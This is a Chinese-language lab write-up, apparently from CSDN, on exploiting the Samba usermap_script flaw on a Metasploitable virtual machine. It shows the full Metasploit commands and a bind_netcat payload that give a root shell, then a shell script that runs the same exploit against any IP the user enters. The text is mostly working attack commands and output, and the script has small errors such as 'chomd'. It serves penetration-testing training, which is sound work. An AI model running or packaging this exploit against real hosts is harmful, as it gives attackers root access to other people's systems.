实验一:通过攻击samba服务漏洞控制linux靶机
目标ip:192.168.232.134
metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj
实验环境:kali linux
kali:msfconsole
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Payload options (cmd/unix/bind_netcat)
msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) >
set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ok
实验二:
用msfcli命令编写shell脚本程序,实现用户只需要输入ip地址,即可使用usermap_script漏洞渗透攻击模块
msfcli已经被取代,建议使用msfconsole -x
kali: vim metasploit.shell
echo "请输入目标ip"
read ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit"
kali:chomd a+x metasploit.shell
kali:./metasploit
来源:CSDN
作者:sky_seeker
链接:https://blog.csdn.net/m0_37641759/article/details/72859083